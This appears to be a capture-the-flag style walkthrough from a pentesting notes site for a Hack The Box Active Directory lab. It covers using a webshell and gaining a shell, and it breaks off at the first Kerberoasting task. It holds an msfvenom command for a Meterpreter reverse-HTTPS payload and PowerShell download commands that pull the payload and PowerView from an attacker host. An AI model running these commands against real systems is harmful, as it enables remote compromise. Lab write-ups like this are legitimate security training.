> For the complete documentation index, see [llms.txt](https://notes.cavementech.com/pentesting-quick-reference/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.cavementech.com/pentesting-quick-reference/active-directory/htb-ad-enumeration-and-attacks-skills-assessment-part-i.md).

# HTB AD Enumeration & Attacks - Skills Assessment Part I

Browsing the uploads folder, we get the webshell.

<figure><img src="/files/kBw8212QGpYMiuBl71V6" alt=""><figcaption></figcaption></figure>

We can directly get the flag from the desktop.

<figure><img src="/files/LS773v4B70ZxDFokQPYe" alt=""><figcaption></figcaption></figure>

#### <mark style="color:orange;">Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer</mark>

Now we need more interactive shell. So we will be using metasploit to gain back a shell.

```
msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.52 -f exe -o backupscript.exe LPORT=4444
```

<figure><img src="/files/adRslDj28XFbuvdUCmWd" alt=""><figcaption></figcaption></figure>

Run the following command to upload the file.

```
Invoke-WebRequest -Uri "http://10.10.14.52:8000/backupscript.exe " -OutFile "C:\windows\system32\inetsrv\backup.exe"
```

Now run it

<figure><img src="/files/k4i5Sl1y1s5TCsFo4ffD" alt=""><figcaption></figcaption></figure>

we will get the shell

<figure><img src="/files/Mv8tRxxgNZIiFl3KnWfA" alt=""><figcaption></figcaption></figure>

Now we need to upload the tools

```
Invoke-WebRequest -Uri "http://10.10.14.124:8000/PowerView.ps1 " -OutFile "C:\PowerView.ps1"
```
